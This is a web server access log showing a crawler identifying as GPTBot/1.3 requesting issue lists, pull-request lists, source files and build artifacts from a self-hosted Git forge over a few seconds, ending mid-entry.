"/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:36:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:36:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14521] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" +[17/Feb/2026:18:36:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=closed&type=all" +[17/Feb/2026:18:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:18:36:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:36:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:18:36:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:36:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:36:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:36:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:36:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:18:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:36:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:36:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11221] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11433] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:18:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:18:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:18:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11222] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:18:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:18:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11434] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:18:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42760] [Gzip 21.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35741] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42735] [Gzip 21.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35738] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13145] [Gzip 4.27] [Sent-to 